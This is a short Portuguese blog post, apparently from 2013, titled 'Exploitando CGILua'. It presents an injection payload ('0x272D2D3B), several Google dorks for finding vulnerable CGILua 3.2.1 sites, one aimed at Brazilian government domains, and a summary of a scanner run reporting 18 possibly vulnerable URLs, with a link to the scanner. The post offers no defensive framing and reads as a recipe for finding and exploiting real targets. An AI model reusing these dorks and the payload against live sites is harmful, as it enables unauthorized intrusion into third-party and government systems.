Exploitando CGILua
ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.
EXPLOIT USADO: '0x272D2D3B
DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"
Usando SCANNER INURL para achar possíveis falhas:
TOTAL DE URL's: 75
TOTAL DE POSSÍVEIS VULL: 18
ARQUIVO COM RESULTADO: resultados.txt
http://blog.inurl.com.br/2013/09/cgilua-321-cgi-exploit.html
Scanner INURL:
https://code.google.com/p/scanner-inurl/
Este comentário foi removido por um administrador do blog.
ResponderExcluir